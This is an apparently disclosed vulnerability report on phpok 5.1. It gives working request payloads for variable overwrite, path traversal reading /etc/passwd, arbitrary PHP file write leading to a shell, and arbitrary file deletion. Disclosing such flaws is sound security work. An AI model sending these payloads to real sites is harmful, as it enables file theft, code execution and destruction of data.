phpok 5.1 have Some Vulnerability

Variable Overwrite Vulnerability

from the Entrance of framework，i discovered parse_str variable overwrite in framework/init.php image_1d4agk20clki110s1ii7u6q1gah9.png-146.3kB

we could watch $query_string parameter in framework/libs/server.php ：

image_1d4agn7g08k431a1fsakoi1kjdm.png-135.9kB

payload：http://phpok/?data[script]=passer6y image_1d4ai86gk1ukh1dd0lgt83e6nl9.png-228.1kB

Vulnerability to read arbitrary files

image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png-402.7kB

back to the: framework/admin/tpl_control.php image_1d4i1oe4tg81163s1hcn18a21kp530.png-197.8kB

framework/admin/appsys_control.php image_1d4i1pat21lbr1fe518r01rf2tjs3d.png-443.2kB

there is two file have this vulnerability: payload1:

/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd

payload2:

/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd

image_1d4l4ok81h0c1ee2dk2ann3p1m.png-521.8kB image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png-280.1kB

Arbitrary File Writing to getshell

edit_save_f() function In framework/admin/tpl_control.php 383 line

image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png-280.9kB

payload:/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f

image_1d4ig2hol1ok17857k61r66bv74k.png-383.1kB

Arbitrary file delete Vulnerability

framework/admin/tpl_control.php 303行 delfile_f()函数： image_1d4l604qqo9c1krlerf7eu1o1b51.png-247.1kB

payload:/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php image_1d4ijnk021ui812v11pc8fap1sb351.png-172kB

qinggan / phpok